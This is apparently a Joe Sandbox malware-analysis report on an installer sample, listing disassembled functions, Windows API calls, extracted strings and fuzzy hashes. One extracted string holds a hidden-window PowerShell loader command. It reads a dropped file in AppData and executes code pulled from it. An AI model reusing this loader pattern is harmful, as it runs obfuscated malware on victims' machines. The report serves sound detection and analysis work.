Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4a21b584643edb5046f40e6021edddc559103c8bcb4823ec96b2e5e26057261d
Instruction ID: d597ae01fe190944f955af81f6da1ccc19e01168c6f1380e4bfb18bbb963e91e
Opcode Fuzzy Hash: 4a21b584643edb5046f40e6021edddc559103c8bcb4823ec96b2e5e26057261d
Instruction Fuzzy Hash: E7D0C977B141509BDB50E7B8AE8945A73A8EB5132A7248833D902E10D2E27DC8429619

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004047E2 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004047FA
GetDlgItem.USER32(?,00000408), ref: 00404805
GlobalAlloc.KERNEL32(00000040,00000010), ref: 0040484F
LoadBitmapA.USER32(0000006E), ref: 00404862
SetWindowLongA.USER32(?,000000FC,00404DD9), ref: 0040487B
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040488F
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048A1
SendMessageA.USER32(?,00001109,00000002), ref: 004048B7
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048C3
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048D5
DeleteObject.GDI32(00000000), ref: 004048D8
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404903
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040490F
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049A4
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049CF
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049E3
GetWindowLongA.USER32(?,000000F0), ref: 00404A12
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A20
ShowWindow.USER32(?,00000005), ref: 00404A31
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B2E
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B93
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BA8
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BCC
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BEC
ImageList_Destroy.COMCTL32(?), ref: 00404C01
GlobalFree.KERNEL32(?), ref: 00404C11
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C8A
SendMessageA.USER32(?,00001102,?,?), ref: 00404D33
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D42
InvalidateRect.USER32(?,00000000,00000001), ref: 00404D62
ShowWindow.USER32(?,00000000), ref: 00404DB0
GetDlgItem.USER32(?,000003FE), ref: 00404DBB
ShowWindow.USER32(00000000), ref: 00404DC2

Strings

, xrefs: 00404D9A
N, xrefs: 00404A6C
M, xrefs: 0040498B

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 69bb8c9092f751f6f699f5119f3777ca3af1155a8d83edf44d343ffd82b318b7
Instruction ID: 37c04c0b90b062a92b087f54257bcfd02c7998473ae754967dc03ef3014ad8ed
Opcode Fuzzy Hash: 69bb8c9092f751f6f699f5119f3777ca3af1155a8d83edf44d343ffd82b318b7
Instruction Fuzzy Hash: DA025CB0900249AFEB10DFA5DC45AAE7BB5FB84314F10857AF610BA2E1C7799E41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004042A6 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004042F5
SetWindowTextA.USER32(00000000,?), ref: 0040431F
SHBrowseForFolderA.SHELL32(?,0079D8D0,?), ref: 004043D0
CoTaskMemFree.OLE32(00000000), ref: 004043DB
lstrcmpiA.KERNEL32(Exec,0079E4F8), ref: 0040440D
lstrcatA.KERNEL32(?,Exec), ref: 00404419
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040442B

Part of subcall function 00405372: GetDlgItemTextA.USER32(?,?,00000400,00404462), ref: 00405385

Part of subcall function 00405DE5: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E3D
Part of subcall function 00405DE5: CharNextA.USER32(?,?,?,00000000), ref: 00405E4A
Part of subcall function 00405DE5: CharNextA.USER32(?,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E4F
Part of subcall function 00405DE5: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E5F

GetDiskFreeSpaceA.KERNEL32(0079D4C8,?,?,0000040F,?,0079D4C8,0079D4C8,?,00000000,0079D4C8,?,?,000003FB,?), ref: 004044E6
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404501
SetDlgItemTextA.USER32(00000000,00000400,0079D4B8), ref: 00404587

Strings

A, xrefs: 004043C9
"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", xrefs: 004042BF
Exec, xrefs: 00404407, 0040440C, 00404417
C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited, xrefs: 004043F6

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"$A$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited$Exec
API String ID: 2246997448-4099546290
Opcode ID: ea3b955debdcdc4cb8b1b8e5bb57ea13b8ccd09341252b79b0c66d07a749c749
Instruction ID: ee484549d64efd2eff965cea5eda3c12ecb716279ba3017c649c9a7946b17b4b
Opcode Fuzzy Hash: ea3b955debdcdc4cb8b1b8e5bb57ea13b8ccd09341252b79b0c66d07a749c749
Instruction Fuzzy Hash: 3C9183B1900218BBDF11AFA1CC41AAF77B8EF84315F54847BFA05B62D1C77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00403FB1 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040403C
GetDlgItem.USER32(00000000,000003E8), ref: 00404050
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040406E
GetSysColor.USER32(?), ref: 0040407F
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040408E
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040409D
lstrlenA.KERNEL32(?), ref: 004040A0
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040AF
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040C4
GetDlgItem.USER32(?,0000040A), ref: 00404126
SendMessageA.USER32(00000000), ref: 00404129
GetDlgItem.USER32(?,000003E8), ref: 00404154
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404194
LoadCursorA.USER32(00000000,00007F02), ref: 004041A3
SetCursor.USER32(00000000), ref: 004041AC
ShellExecuteA.SHELL32(0000070B,open,007A0EA0,00000000,00000000,00000001), ref: 004041BF
LoadCursorA.USER32(00000000,00007F00), ref: 004041CC
SetCursor.USER32(00000000), ref: 004041CF
SendMessageA.USER32(00000111,00000001,00000000), ref: 004041FB
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040420F

Strings

Exec, xrefs: 0040417F
open, xrefs: 004041B7
|?@, xrefs: 004041B4
N, xrefs: 00404142

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Exec$N$open$|?@
API String ID: 3615053054-360928054
Opcode ID: fee43ce551ef0b03fa8414572cca722d93e17a607ba525d10f69864d1f38e249
Instruction ID: 1aa85ca6dc080267a903cc48d2afa20b9f684c9b7acc4f3344bac945280a7f58
Opcode Fuzzy Hash: fee43ce551ef0b03fa8414572cca722d93e17a607ba525d10f69864d1f38e249
Instruction Fuzzy Hash: D061E5B1A40209BFEB109F20DD45F6A3B69FB44741F10856AFB04BA2D1C7B8E951CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Profiling Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Profiling Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Profiling Setup
API String ID: 941294808-625439139
Opcode ID: e71fa4b7cd7db18ec6937c90ef8ef03dc97b1c494a2d0299c5982f2cadabd8f1
Instruction ID: 1970eda38267bcdb885ac0a700297f93df6a90a6824bbd846fa9b4042a90093d
Opcode Fuzzy Hash: e71fa4b7cd7db18ec6937c90ef8ef03dc97b1c494a2d0299c5982f2cadabd8f1
Instruction Fuzzy Hash: DE419A71804249AFCB058F95CD459BFBFB9FF45311F00812AF962AA1A0C738EA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004058B2 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(007A0288,NUL,?,00000000,?,00000000,?,00405A56,?,?,00000001,004055F9,?,00000000,000000F1,?), ref: 004058C2
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A56,?,?,00000001,004055F9,?,00000000,000000F1,?), ref: 004058E6
GetShortPathNameA.KERNEL32(00000000,007A0288,00000400), ref: 004058EF

Part of subcall function 00405770: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 00405780
Part of subcall function 00405770: lstrlenA.KERNEL32(0040599F,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 004057B2

GetShortPathNameA.KERNEL32(?,007A0688,00000400), ref: 0040590C
wsprintfA.USER32 ref: 0040592A
GetFileSize.KERNEL32(00000000,00000000,007A0688,C0000000,00000004,007A0688,?,?,?,?,?), ref: 00405965
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405974
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059AC
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,0079FE88,00000000,-0000000A,0040936C,00000000,[Rename],00000000,00000000,00000000), ref: 00405A02
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A14
GlobalFree.KERNEL32(00000000), ref: 00405A1B
CloseHandle.KERNEL32(00000000), ref: 00405A22

Part of subcall function 0040580B: GetFileAttributesA.KERNELBASE(00000003,00402C6B,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 0040580F
Part of subcall function 0040580B: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405831

Strings

NUL, xrefs: 004058BC
%s=%s, xrefs: 00405920
[Rename], xrefs: 00405994, 004059A6

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 1265525490-4148678300
Opcode ID: 6f5e4b39622fb637ff713e3a36fe671cf140b9a9d1460b59bca6c69fc40f4791
Instruction ID: eaebdebf8796e3850c000fe6eb76ad3f7fb5957efc68c2b36b1b91be42a79c1d
Opcode Fuzzy Hash: 6f5e4b39622fb637ff713e3a36fe671cf140b9a9d1460b59bca6c69fc40f4791
Instruction Fuzzy Hash: 6A410271604B09BFD6206B656C8AF6B3A9CDF45755F14063AFE01F22D2DA7CA8008E7D

Uniqueness

Uniqueness Score: -1.00%

Function 100018E6 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 80processstringsynchronizationCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(00000400), ref: 10001917
lstrcpynA.KERNEL32(?,00000000), ref: 10001925
CharNextA.USER32(00000022), ref: 10001952
CharNextA.USER32(00000022), ref: 1000195B
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 1000197C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000198E
GetExitCodeProcess.KERNEL32(?,?), ref: 1000199B
CloseHandle.KERNEL32(?), ref: 100019AA
CloseHandle.KERNEL32(?), ref: 100019AF
ExitProcess.KERNEL32 ref: 100019B4
ExitProcess.KERNEL32 ref: 100019BF

Strings

", xrefs: 1000193A
", xrefs: 1000192B
D, xrefs: 10001910

Memory Dump Source

Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd

Similarity

API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
String ID: "$"$D
API String ID: 3771911414-3923985841
Opcode ID: 12b261d6a5aa96717ea24bad317dba62f878875c91062f505561c8784659ec93
Instruction ID: b40d0a37d8f927bbe092ed1c880d4586c9b93be4a50fa1aacb8e4b1865fff066
Opcode Fuzzy Hash: 12b261d6a5aa96717ea24bad317dba62f878875c91062f505561c8784659ec93
Instruction Fuzzy Hash: 84213DB180425DAFFF11DBA0CC98BEFBFBAEB05391F404055E245A20A6D6701D49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE5 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E3D
CharNextA.USER32(?,?,?,00000000), ref: 00405E4A
CharNextA.USER32(?,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E4F
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E5F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE6, 00405DEB
"C:\Users\user\Desktop\hnTW5HdWvY.exe", xrefs: 00405E21
*?|<>/":, xrefs: 00405E2D

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-201144300
Opcode ID: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
Instruction ID: 98207d01bde9e00a0eed0430611c531f9d380fb7e7b936b50ef7ef360768d6c7
Opcode Fuzzy Hash: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
Instruction Fuzzy Hash: A6110871804B9429F73217248C40B777F98CB56760F18047BE5D5722C2C67C5E828EED

Uniqueness

Uniqueness Score: -1.00%

Function 00403ECF Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403EEC
GetSysColor.USER32(00000000), ref: 00403F08
SetTextColor.GDI32(?,00000000), ref: 00403F14
SetBkMode.GDI32(?,?), ref: 00403F20
GetSysColor.USER32(?), ref: 00403F33
SetBkColor.GDI32(?,?), ref: 00403F43
DeleteObject.GDI32(?), ref: 00403F5D
CreateBrushIndirect.GDI32(?), ref: 00403F67

Memory Dump Source

